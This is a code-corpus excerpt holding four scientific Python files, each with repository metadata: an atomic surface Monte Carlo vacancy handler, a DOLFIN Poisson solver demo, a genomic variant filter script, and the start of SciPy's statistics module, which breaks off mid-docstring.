self.coordinations[n] -= 1
self.types[n] = self.get_atom_type(self.neighbors[n])
# Add the old and remove the new position
self.remove_vacancy(self.vacant_i)
self.add_vacancy(old_position,
old_neighbors,
old_coordination,
old_type)
# Update vacancies around the moved atom old and new position
self.remove_vacancies(self.surface_i)
self.add_vacancies(self.positions[self.surface_i],
self.neighbors[self.surface_i],
self.surface_i)
#Print that an atom is moved
if self.debug:
print (">> Moving atom %i (%2.2f %2.2f %2.2f) " %
(self.surface_i, old_position[0],
old_position[1], old_position[2]) +
"to vacancy %i (%2.2f %2.2f %2.2f):" %
(self.vacant_i, new_position[0],
new_position[1], new_position[2]))
if self.debug > 2:
check_vacancies = self.check_vacancies()
check_neighbors = self.check_neighbors()
if check_vacancies or check_neighbors:
raise Warning('Something is wrong, read messages above')
# Manipulation functions for vacancies
def add_vacancy(self, position, neighbors, coordination, type):
"""Adds a single vacancy, without updating any lists."""
if self.debug:
print ("Adding vacancy %i (%2.2f %2.2f %2.2f)" %
(len(self.vacant_positions), position[0], position[1], position[2]))
self.vacant_positions = np.append(self.vacant_positions,
position.reshape(1, 3),
axis=0)
self.vacant_neighbors = np.append(self.vacant_neighbors,
neighbors.reshape(1, self.neighbor_count),
axis=0)
self.vacant_coordinations = np.append(self.vacant_coordinations,
coordination)
self.vacant_types = np.append(self.vacant_types,
type)
def remove_vacancy(self, index):
"""Removes a single vacancy, without updating any lists."""
if self.debug:
position = self.vacant_positions[index]
print ("Removing vacacy %i (%2.2f %2.2f %2.2f)" %
(index, position[0], position[1], position[2]))
self.vacant_positions = np.delete(self.vacant_positions, index, axis=0)
self.vacant_neighbors = np.delete(self.vacant_neighbors, index, axis=0)
self.vacant_coordinations = np.delete(self.vacant_coordinations, index)
self.vacant_types = np.delete(self.vacant_types, index)
def add_vacancies(self, position, neighbors, index):
"""Adds and updates vacancies associated with the atom
at "position" indexed with "index". It will only add a
vacancy if it is not pressent in the list of vacancies
already."""
for i, n in enumerate(neighbors):
if n < 0:
vacant_position = position + self.neighbor_positions[i]
vacant_append = True
for j, vp in enumerate(self.vacant_positions):
if (np.abs(vp - vacant_position) < 1e-3).all():
self.vacant_neighbors[j][self.neighbor_mapping[i]] = index
self.vacant_coordinations[j] += 1
self.vacant_types[j] = self.get_atom_type(self.vacant_neighbors[j])
vacant_append = False
if vacant_append:
if self.debug:
print ("Adding vacancy %i (%2.2f %2.2f %2.2f)" %
(len(self.vacant_positions),
vacant_position[0],
vacant_position[1],
vacant_position[2]))
self.vacant_positions = np.append(self.vacant_positions,
vacant_position.reshape(1,3),
axis=0)
self.vacant_neighbors = np.append(self.vacant_neighbors,
-np.ones((1,self.neighbor_count), dtype=int),
axis=0)
self.vacant_neighbors[-1][self.neighbor_mapping[i]] = index
self.vacant_coordinations = np.append(self.vacant_coordinations, 1)
self.vacant_types = np.append(self.vacant_types,
self.get_atom_type(self.vacant_neighbors[-1]))
def remove_vacancies(self, index):
"""Removes and updates vacancies associated with the
atom indexed "index". It will only remove vacancies
if they are not associated with other atoms."""
i = 0
end = len(self.vacant_neighbors)
while i < end:
vacant_remove = True
for j, n in enumerate(self.vacant_neighbors[i]):
if n >= 0 and n != index:
vacant_remove = False
if n == index:
self.vacant_neighbors[i][j] = -1
self.vacant_coordinations[i] -= 1
self.vacant_types[i] = self.get_atom_type(self.vacant_neighbors[i])
if vacant_remove:
if self.debug:
position = self.vacant_positions[i]
print ("Removing vacacy %i (%2.2f %2.2f %2.2f)" %
(i, position[0], position[1], position[2]))
end -= 1
self.vacant_positions = np.delete(self.vacant_positions, i, axis=0)
self.vacant_neighbors = np.delete(self.vacant_neighbors, i, axis=0)
self.vacant_coordinations = np.delete(self.vacant_coordinations, i)
self.vacant_types = np.delete(self.vacant_types, i)
else:
i += 1
# Some useful functions
def surface_indexes(self):
"""Returns the indexes for all the surface atoms (coordination < 12)."""
mask = self.coordinations < 12
return np.arange(self.natoms)[mask]
def vacant_indexes(self):
"""Returns the indexes for the vacancies."""
return np.arange(len(self.vacant_positions))
def get_atom_coordination(self, neighbors):
neighbors = np.array(neighbors)
neighbors = neighbors[neighbors >= 0]
return len(neighbors)
def get_atom_type(self, neighbors):
neighbors = np.array(neighbors)
typename = tuple((neighbors >= 0).astype(int))
if typename in self.type_names:
return self.type_data[self.type_numbers[typename]]['type']
else:
return 0
# Functions to check the neighbor lists and vacancies
def check_neighbors(self):
print ">> Checking the neighbor list..."
positions = self.positions
neighbors = self.neighbors
coordinations = self.coordinations
types = self.types
trouble = False
for i, n in enumerate(neighbors):
for j, m in enumerate(n):
found = False
p1 = positions[i] + self.neighbor_positions[j]
for k, p2 in enumerate(positions):
if (np.abs(p1 - p2) < 1e-3).all():
found = True
if m < 0:
print 'Atom %i is missing neighbor atom %i at %s' % (i, k, p2)
trouble = True
elif m != k:
print ('Atom %i is having atom %i as ' +
'neighbor instead of atom %i' % (i, m, k))
trouble = True
if m >= 0 and found is False:
trouble = True
print 'Atom %i does not have atom %i as neighbor' % (i, m)
if self.get_atom_coordination(n) != coordinations[i]:
trouble = True
print 'Atom %i coordination does not match' % i
if self.get_atom_type(n) != types[i]:
trouble = True
print 'Atom %i type does not match' % i
return trouble
def check_vacancies(self):
print ">> Checking the vacancies..."
vacant_positions = self.vacant_positions
vacant_neighbors = self.vacant_neighbors
positions = self.positions
trouble = False
for i, p1 in enumerate(vacant_positions):
for j, p2 in enumerate(positions):
if (np.abs(p1 - p2) < 1e-3).all():
trouble = True
print "Vacancy %i is identical to %i at %s" % (i, j, p1)
for i, n in enumerate(vacant_neighbors):
for j, m in enumerate(n):
p1 = vacant_positions[i] + self.neighbor_positions[j]
for k, p2 in enumerate(positions):
if (np.abs(p1 - p2) < 1e-3).all():
if m < 0:
print 'Vacancy %i is missing neighbor atom %i at %s' % (i, k, p2)
trouble = True
elif m != k:
print ('Vacancy %i is having atom %i as ' % (i, m) +
'neighbor instead of atom %i' % k)
trouble = True
return trouble
|
auag92/n2dm
|
Asap-3.8.4/Python/asap3/MonteCarlo/Moves/Surface.py
|
Python
|
mit
| 15,210
|
[
"ASE"
] |
da12e8cb133c89e97195deb708497e08457c7cac951ad99a3bf8da9c2e77c5bf
|
"""This demo program solves Poisson's equation
- div grad u(x, y) = f(x, y)
on the unit square with source f given by
f(x, y) = 10*exp(-((x - 0.5)^2 + (y - 0.5)^2) / 0.02)
and boundary conditions given by
u(x, y) = 0 for x = 0 or x = 1
du/dn(x, y) = sin(5*x) for y = 0 or y = 1
"""
# Copyright (C) 2007-2011 Anders Logg
#
# This file is part of DOLFIN.
#
# DOLFIN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DOLFIN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DOLFIN. If not, see <http://www.gnu.org/licenses/>.
#
# First added: 2007-08-16
# Last changed: 2012-11-12
# Begin demo
from dolfin import *
import scipy.sparse as sps
import scipy.io as save
import scipy
import pdb
# parameters.linear_algebra_backend = "uBLAS"
# Create mesh and define function space:
mesh = UnitSquareMesh(500, 500)
V = FunctionSpace(mesh, "Lagrange", 1)
# Define Dirichlet boundary (x = 0 or x = 1)
def boundary(x):
return x[0] < DOLFIN_EPS or x[0] > 1.0 - DOLFIN_EPS
# Define boundary condition
u0 = Constant(0.0)
bc = DirichletBC(V, u0, boundary)
# Define variational problem
u = TrialFunction(V)
v = TestFunction(V)
f = Expression("10*exp(-(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)")
g = Expression("sin(5*x[0])")
a = inner(grad(u), grad(v))*dx
L = f*v*dx + g*v*ds
print "starting assemble"
A, bb = assemble_system(a, L, bc)
# solver = KrylovSolver("tfqmr", "amg")
# solver.set_operators(A, A)
# Compute solution
u = Function(V)
print "solve"
# solve(A,u.vector(),bb)
set_log_level(PROGRESS)
solver = KrylovSolver("cg")
# solver.parameters["relative_tolerance"] = 1e-10
# solver.parameters["absolute_tolerance"] = 1e-7
solver.solve(A,u.vector(),bb)
set_log_level(PROGRESS)
# problem = VariationalProblem(a, L, bc)
# problem.parameters["linear_solver"] = "gmres"aaa
# problem.parameters["preconditioner"] = "ilu"
# u = problem.solve()
parameters.linear_algebra_backend = "uBLAS"
A, bb = assemble_system(a, L, bc)
print "store matrix"
rows, cols, values = A.data()
# rows1, values1 = bb.data()
Aa = sps.csr_matrix((values, cols, rows))
# b = sps.csr_matrix((values1, cols1, rows1))
print "save matrix"
scipy.io.savemat("Ab.mat", {"A": Aa, "b":bb.data()},oned_as='row')
# scipy.io.savemat("b.mat", {"b": bb.data()},oned_as='row')
# Save solution in VTK format
# file = File("poisson.pvd")
# file << u
# Plot solution
plot(u, interactive=True)
|
wathen/PhD
|
MHD/FEniCS/Test/demo_poisson.py
|
Python
|
mit
| 2,858
|
[
"VTK"
] |
609b8096b4776b43f3102a23aa07fc531088a90b9a9845f2a8cb5b9b4bace881
|
# This script is used to filter polymorphism data in VA files according to a number of criteria determined by arguments from the workflow.
# The STEP argument is used to distinguish different types of filtering that are needed during the analysis
# STEP = 1: Normal argument-driven filtering
# STEP = 2: Candidate region filtering
# STEP = 3: Initial filtering + eliminates indels from the first VA files + eliminates variants from contigs shorter than 1 MB
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-a', action="store", dest = 'input')
parser.add_argument('-b', action="store", dest = 'output')
parser.add_argument('-fasta', action="store", dest = 'fasta')
parser.add_argument('-chr', action="store", dest = 'chr', default = '*', nargs='+')
parser.add_argument('-mut_type', action="store", dest = 'mut_type', default = 'all') # / EMS
parser.add_argument('-qual_min', action="store", dest = 'qual_min', default = 0)
parser.add_argument('-dp_min', action="store", dest = 'dp_min', default = 0)
parser.add_argument('-dp_max', action="store", dest = 'dp_max', default = 8000)
parser.add_argument('-af_min', action="store", dest = 'af_min', default = 0)
parser.add_argument('-af_max', action="store", dest = 'af_max', default = 2)
parser.add_argument('-pos_min', action="store", dest = 'pos_min', default = 0)
parser.add_argument('-pos_max', action="store", dest = 'pos_max', default = 1000000000)
parser.add_argument('-step', action="store", dest = 'step')
parser.add_argument('-cand_reg_file', action="store", dest = 'cand_reg_file')
args = parser.parse_args()
#Input
input = args.input
f1 = open(input, 'r')
lines = f1.readlines()
#Output
output = args.output
f2 = open(output, 'w')
step = args.step
#_________________________________CANDIDATE REGION FILTER___________________________________________________________________________________
if step == '1':
pass
elif step == '2':
f3 = open(args.cand_reg_file, 'r')
f3lines = f3.readlines()
for i, line in enumerate(f3lines):
if line.startswith('?'):
sp = line.split()
args.chr = sp[1].strip('>')
args.pos_min = int(sp[2].strip())
args.pos_max = int(sp[3].strip())
#__________________________________________________________________________________________________________________________________________
def limits():
global selector
selector = 0
if (
(int(args.pos_min) < int(sp[1].strip()) < int(args.pos_max))
and float(sp[4].strip()) > float(args.qual_min)
and int(args.dp_min) < (int(sp[6].strip()) + int(sp[5].strip())) < int(args.dp_max)
and float(args.af_min) < ((float(sp[6].strip())/ ((float(sp[6].strip())) + (float(sp[5].strip()))))) < float(args.af_max)
):
selector = 1
else:
selector = 0
return [selector]
#__________________________________________________________________________________________________________________________________________
chromosome = args.chr
if step == '1' or step == '2':
for i, line in enumerate(lines):
if not line.startswith('#'):
sp = line.split('\t')
if args.mut_type.strip() == 'EMS' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
ref_b = sp[2]
alt_b = sp[3]
if (
(selector == 1)
and ((ref_b.strip() == 'G' and alt_b.strip() == 'A')
or (ref_b.strip() == 'C' and alt_b.strip() == 'T'))
):
f2.write(line)
elif args.mut_type.strip() == 'all' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
if selector == 1:
f2.write(line)
f2.close()
if step == '3':
# Function to parse fasta file (based on one of the Biopython IOs)
def read_fasta(fp):
name, seq = None, []
for line in fp:
line = line.rstrip()
if line.startswith('>'):
if name: yield (name, ''.join(seq))
name, seq = line, []
else:
seq.append(line)
if name: yield (name, ''.join(seq))
# Read contig fasta file
contig_lengths = list()
contig_source = args.fasta
with open(contig_source) as fp:
fastalist = list()
for name_contig, seq_contig in read_fasta(fp):
innerlist = list()
innerlist.append(name_contig.strip('>'))
innerlist.append(len(seq_contig))
fastalist.append(innerlist)
large_contigs = list()
for contig in fastalist:
if int(contig[1]) > 1000000:
large_contigs.append(contig[0])
# Filter
for i, line in enumerate(lines):
if not line.startswith('#'):
sp = line.split('\t')
if len(sp[2].strip()) == 1 and len(sp[3].strip()) == 1:
if str(sp[0]).strip() in large_contigs:
if args.mut_type.strip() == 'EMS' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
ref_b = sp[2]
alt_b = sp[3]
if (
(selector == 1)
and ((ref_b.strip() == 'G' and alt_b.strip() == 'A')
or (ref_b.strip() == 'C' and alt_b.strip() == 'T'))
):
f2.write(line)
elif args.mut_type.strip() == 'all' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
if selector == 1:
f2.write(line)
f2.close()
|
davidwilson-85/easymap
|
scripts_snp/variants-filter.py
|
Python
|
gpl-3.0
| 5,099
|
[
"Biopython"
] |
2f8e49f089d0b0a1a41d9f5dd105d475f98a0d0e3af3c893dfcc406418b2653a
|
# Copyright 2002 Gary Strangman. All rights reserved
# Copyright 2002-2016 The SciPy Developers
#
# The original code from Gary Strangman was heavily adapted for
# use in SciPy by Travis Oliphant. The original code came with the
# following disclaimer:
#
# This software is provided "as-is". There are no expressed or implied
# warranties of any kind, including, but not limited to, the warranties
# of merchantability and fitness for a given application. In no event
# shall Gary Strangman be liable for any direct, indirect, incidental,
# special, exemplary or consequential damages (including, but not limited
# to, loss of use, data or profits, or business interruption) however
# caused and on any theory of liability, whether in contract, strict
# liability or tort (including negligence or otherwise) arising in any way
# out of the use of this software, even if advised of the possibility of
# such damage.
"""
A collection of basic statistical functions for Python.
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
import warnings
import math
from math import gcd
from collections import namedtuple
import numpy as np
from numpy import array, asarray, ma
from numpy.lib import NumpyVersion
from scipy.spatial.distance import cdist
from scipy.ndimage import _measurements
from scipy._lib._util import (check_random_state, MapWrapper,
rng_integers, float_factorial)
import scipy.special as special
from scipy import linalg
from . import distributions
from . import _mstats_basic as mstats_basic
from ._stats_mstats_common import (_find_repeats, linregress, theilslopes,
siegelslopes)
from ._stats import (_kendall_dis, _toint64, _weightedrankedtau,
_local_correlations)
from dataclasses import make_dataclass
from ._hypotests import _all_partitions
from ._hypotests_pythran import _compute_outer_prob_inside_method
from ._axis_nan_policy import (_axis_nan_policy_factory,
_broadcast_concatenate)
# Functions/classes in other files should be added in `__init__.py`, not here
__all__ = ['find_repeats', 'gmean', 'hmean', 'mode', 'tmean', 'tvar',
'tmin', 'tmax', 'tstd', 'tsem', 'moment',
'skew', 'kurtosis', 'describe', 'skewtest', 'kurtosistest',
'normaltest', 'jarque_bera', 'itemfreq',
'scoreatpercentile', 'percentileofscore',
'cumfreq', 'relfreq', 'obrientransform',
'sem', 'zmap', 'zscore', 'gzscore', 'iqr', 'gstd',
'median_absolute_deviation', 'median_abs_deviation',
'sigmaclip', 'trimboth', 'trim1', 'trim_mean',
'f_oneway', 'F_onewayConstantInputWarning',
'F_onewayBadInputSizesWarning',
'PearsonRConstantInputWarning', 'PearsonRNearConstantInputWarning',
'pearsonr', 'fisher_exact',
'SpearmanRConstantInputWarning', 'spearmanr', 'pointbiserialr',
'kendalltau', 'weightedtau', 'multiscale_graphcorr',
'linregress', 'siegelslopes', 'theilslopes', 'ttest_1samp',
'ttest_ind', 'ttest_ind_from_stats', 'ttest_rel',
'kstest', 'ks_1samp', 'ks_2samp',
'chisquare', 'power_divergence',
'tiecorrect', 'ranksums', 'kruskal', 'friedmanchisquare',
'rankdata',
'combine_pvalues', 'wasserstein_distance', 'energy_distance',
'brunnermunzel', 'alexandergovern']
def _contains_nan(a, nan_policy='propagate'):
policies = ['propagate', 'raise', 'omit']
if nan_policy not in policies:
raise ValueError("nan_policy must be one of {%s}" %
', '.join("'%s'" % s for s in policies))
try:
# Calling np.sum to avoid creating a huge array into memory
# e.g. np.isnan(a).any()
with np.errstate(invalid='ignore', over='ignore'):
contains_nan = np.isnan(np.sum(a))
except TypeError:
# This can happen when attempting to sum things which are not
# numbers (e.g. as in the function `mode`). Try an alternative method:
try:
contains_nan = np.nan in set(a.ravel())
except TypeError:
# Don't know what to do. Fall back to omitting nan values and
# issue a warning.
contains_nan = False
nan_policy = 'omit'
warnings.warn("The input array could not be properly "
"checked for nan values. nan values "
"will be ignored.", RuntimeWarning)
if contains_nan and nan_policy == 'raise':
raise ValueError("The input contains nan values")
return contains_nan, nan_policy
def _chk_asarray(a, axis):
if axis is None:
a = np.ravel(a)
outaxis = 0
else:
a = np.asarray(a)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
return a, outaxis
def _chk2_asarray(a, b, axis):
if axis is None:
a = np.ravel(a)
b = np.ravel(b)
outaxis = 0
else:
a = np.asarray(a)
b = np.asarray(b)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
if b.ndim == 0:
b = np.atleast_1d(b)
return a, b, outaxis
def _shape_with_dropped_axis(a, axis):
"""
Given an array `a` and an integer `axis`, return the shape
of `a` with the `axis` dimension removed.
Examples
--------
>>> a = np.zeros((3, 5, 2))
>>> _shape_with_dropped_axis(a, 1)
(3, 2)
"""
shp = list(a.shape)
try:
del shp[axis]
except IndexError:
raise np.AxisError(axis, a.ndim) from None
return tuple(shp)
def _broadcast_shapes(shape1, shape2):
"""
Given two shapes (i.e. tuples of integers), return the shape
that would result from broadcasting two arrays with the given
shapes.
Examples
--------
>>> _broadcast_shapes((2, 1), (4, 1, 3))
(4, 2, 3)
"""
d = len(shape1) - len(shape2)
if d <= 0:
shp1 = (1,)*(-d) + shape1
shp2 = shape2
else:
shp1 = shape1
shp2 = (1,)*d + shape2
shape = []
for n1, n2 in zip(shp1, shp2):
if n1 == 1:
n = n2
elif n2 == 1 or n1 == n2:
n = n1
else:
raise ValueError(f'shapes {shape1} and {shape2} could not be '
'broadcast together')
shape.append(n)
return tuple(shape)
def _broadcast_shapes_with_dropped_axis(a, b, axis):
"""
Given two arrays `a` and `b` and an integer `axis`, find the
shape of the broadcast result after dropping `axis` from the
shapes of `a` and `b`.
Examples
--------
>>> a = np.zeros((5, 2, 1))
>>> b = np.zeros((1, 9, 3))
>>> _broadcast_shapes_with_dropped_axis(a, b, 1)
(5, 3)
"""
shp1 = _shape_with_dropped_axis(a, axis)
shp2 = _shape_with_dropped_axis(b, axis)
try:
shp = _broadcast_shapes(shp1, shp2)
except ValueError:
raise ValueError(f'non-axis shapes {shp1} and {shp2} could not be '
'broadcast together') from None
return shp
# note that `weights` are paired with `x`
@_axis_nan_policy_factory(
lambda x: x, n_samples=1, n_outputs=1, too_small=0, paired=True,
result_unpacker=lambda x: (x,), kwd_samples=['weights'])
def gmean(a, axis=0, dtype=None, weights=None):
r"""Compute the weighted geometric mean along the specified axis.
The weighted geometric mean of the array :math:`a_i` associated to weights
:math:`w_i` is:
.. math::
\exp \left( \frac{ \sum_{i=1}^n w_i \ln a_i }{ \sum_{i=1}^n w_i }
\right) \, ,
and, with equal weights, it gives:
.. math::
\sqrt[n]{ \prod_{i=1}^n a_i } \, .
Parameters
----------
a : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the geometric mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If dtype is not specified, it defaults to the
dtype of a, unless a has an integer dtype with a precision less than
that of the default platform integer. In that case, the default
platform integer is used.
weights : array_like, optional
The `weights` array must be broadcastable to the same shape as `a`.
Default is None, which gives each value a weight of 1.0.
Returns
-------
gmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
hmean : Harmonic mean
Notes
-----
The geometric average is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
References
----------
.. [1] "Weighted Geometric Mean", *Wikipedia*,
https://en.wikipedia.org/wiki/Weighted_geometric_mean.
Examples
--------
>>> from scipy.stats import gmean
>>> gmean([1, 4])
2.0
>>> gmean([1, 2, 3, 4, 5, 6, 7])
3.3800151591412964
>>> gmean([1, 4, 7], weights=[3, 1, 3])
2.80668351922014
"""
if not isinstance(a, np.ndarray):
# if not an ndarray object attempt to convert it
log_a = np.log(np.array(a, dtype=dtype))
elif dtype:
# Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
log_a = np.log(np.ma.asarray(a, dtype=dtype))
else:
log_a = np.log(np.asarray(a, dtype=dtype))
else:
log_a = np.log(a)
if weights is not None:
weights = np.asanyarray(weights, dtype=dtype)
return np.exp(np.average(log_a, axis=axis, weights=weights))
@_axis_nan_policy_factory(
lambda x: x, n_samples=1, n_outputs=1, too_small=0, paired=True,
result_unpacker=lambda x: (x,), kwd_samples=['weights'])
def hmean(a, axis=0, dtype=None, *, weights=None):
r"""Calculate the weighted harmonic mean along the specified axis.
The weighted harmonic mean of the array :math:`a_i` associated to weights
:math:`w_i` is:
.. math::
\frac{ \sum_{i=1}^n w_i }{ \sum_{i=1}^n \frac{w_i}{a_i} } \, ,
and, with equal weights, it gives:
.. math::
\frac{ n }{ \sum_{i=1}^n \frac{1}{a_i} } \, .
Parameters
----------
a : array_like
Input array, masked array or object that can be converted to an array.
axis : int or None, optional
Axis along which the harmonic mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If `dtype` is not specified, it defaults to the
dtype of `a`, unless `a` has an integer `dtype` with a precision less
than that of the default platform integer. In that case, the default
platform integer is used.
weights : array_like, optional
The weights array can either be 1-D (in which case its length must be
the size of `a` along the given `axis`) or of the same shape as `a`.
Default is None, which gives each value a weight of 1.0.
.. versionadded:: 1.9
Returns
-------
hmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
gmean : Geometric mean
Notes
-----
The harmonic mean is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
References
----------
.. [1] "Weighted Harmonic Mean", *Wikipedia*,
https://en.wikipedia.org/wiki/Harmonic_mean#Weighted_harmonic_mean
.. [2] Ferger, F., "The nature and use of the harmonic mean", Journal of
the American Statistical Association, vol. 26, pp. 36-40, 1931
Examples
--------
>>> from scipy.stats import hmean
>>> hmean([1, 4])
1.6000000000000001
>>> hmean([1, 2, 3, 4, 5, 6, 7])
2.6997245179063363
>>> hmean([1, 4, 7], weights=[3, 1, 3])
1.9029126213592233
"""
if not isinstance(a, np.ndarray):
a = np.array(a, dtype=dtype)
elif dtype:
# Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
a = np.ma.asarray(a, dtype=dtype)
else:
a = np.asarray(a, dtype=dtype)
if np.all(a >= 0):
# Harmonic mean only defined if greater than or equal to zero.
if weights is not None:
weights = np.asanyarray(weights, dtype=dtype)
with np.errstate(divide='ignore'):
return 1.0 / np.average(1.0 / a, axis=axis, weights=weights)
else:
raise ValueError("Harmonic mean only defined if all elements greater "
"than or equal to zero")
ModeResult = namedtuple('ModeResult', ('mode', 'count'))
def mode(a, axis=0, nan_policy='propagate'):
"""Return an array of the modal (most common) value in the passed array.
If there is more than one such value, only the smallest is returned.
The bin-count for the modal bins is also returned.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mode : ndarray
Array of modal values.
count : ndarray
Array of counts for each mode.
Examples
--------
>>> a = np.array([[6, 8, 3, 0],
... [3, 2, 1, 7],
... [8, 1, 8, 4],
... [5, 3, 0, 5],
... [4, 7, 5, 9]])
>>> from scipy import stats
>>> stats.mode(a)
ModeResult(mode=array([[3, 1, 0, 0]]), count=array([[1, 1, 1, 1]]))
To get mode of whole array, specify ``axis=None``:
>>> stats.mode(a, axis=None)
ModeResult(mode=array([3]), count=array([3]))
"""
a, axis = _chk_asarray(a, axis)
if a.size == 0:
return ModeResult(np.array([]), np.array([]))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.mode(a, axis)
if a.dtype == object and np.nan in set(a.ravel()):
# Fall back to a slower method since np.unique does not work with NaN
scores = set(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape, dtype=a.dtype)
oldcounts = np.zeros(testshape, dtype=int)
for score in scores:
template = (a == score)
counts = np.sum(template, axis, keepdims=True)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
return ModeResult(mostfrequent, oldcounts)
def _mode1D(a):
vals, cnts = np.unique(a, return_counts=True)
return vals[cnts.argmax()], cnts.max()
# np.apply_along_axis will convert the _mode1D tuples to a numpy array,
# casting types in the process.
# This recreates the results without that issue
# View of a, rotated so the requested axis is last
a_view = np.moveaxis(a, axis, -1)
inds = np.ndindex(a_view.shape[:-1])
modes = np.empty(a_view.shape[:-1], dtype=a.dtype)
counts = np.empty(a_view.shape[:-1], dtype=np.int_)
for ind in inds:
modes[ind], counts[ind] = _mode1D(a_view[ind])
newshape = list(a.shape)
newshape[axis] = 1
return ModeResult(modes.reshape(newshape), counts.reshape(newshape))
def _mask_to_limits(a, limits, inclusive):
"""Mask an array for values outside of given limits.
This is primarily a utility function.
Parameters
----------
a : array
limits : (float or None, float or None)
A tuple consisting of the (lower limit, upper limit). Values in the
input array less than the lower limit or greater than the upper limit
will be masked out. None implies no limit.
inclusive : (bool, bool)
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to lower or upper are allowed.
Returns
-------
A MaskedArray.
Raises
------
A ValueError if there are no values within the given limits.
"""
lower_limit, upper_limit = limits
lower_include, upper_include = inclusive
am = ma.MaskedArray(a)
if lower_limit is not None:
if lower_include:
am = ma.masked_less(am, lower_limit)
else:
am = ma.masked_less_equal(am, lower_limit)
if upper_limit is not None:
if upper_include:
am = ma.masked_greater(am, upper_limit)
else:
am = ma.masked_greater_equal(am, upper_limit)
if am.count() == 0:
raise ValueError("No array values within given limits")
return am
def tmean(a, limits=None, inclusive=(True, True), axis=None):
"""Compute the trimmed mean.
This function finds the arithmetic mean of given values, ignoring values
outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None (default), then all
values are used. Either of the limit values in the tuple can also be
None representing a half-open interval.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to compute test. Default is None.
Returns
-------
tmean : ndarray
Trimmed mean.
See Also
--------
trim_mean : Returns mean after trimming a proportion from both tails.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmean(x)
9.5
>>> stats.tmean(x, (3,17))
10.0
"""
a = asarray(a)
if limits is None:
return np.mean(a, axis)
am = _mask_to_limits(a, limits, inclusive)
mean = np.ma.filled(am.mean(axis=axis), fill_value=np.nan)
return mean if mean.ndim > 0 else mean.item()
def tvar(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""Compute the trimmed variance.
This function computes the sample variance of an array of values,
while ignoring values which are outside of given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tvar : float
Trimmed variance.
Notes
-----
`tvar` computes the unbiased sample variance, i.e. it uses a correction
factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tvar(x)
35.0
>>> stats.tvar(x, (3,17))
20.0
"""
a = asarray(a)
a = a.astype(float)
if limits is None:
return a.var(ddof=ddof, axis=axis)
am = _mask_to_limits(a, limits, inclusive)
amnan = am.filled(fill_value=np.nan)
return np.nanvar(amnan, ddof=ddof, axis=axis)
def tmin(a, lowerlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""Compute the trimmed minimum.
This function finds the miminum value of an array `a` along the
specified axis, but only considering values greater than a specified
lower limit.
Parameters
----------
a : array_like
Array of values.
lowerlimit : None or float, optional
Values in the input array less than the given limit will be ignored.
When lowerlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the lower limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
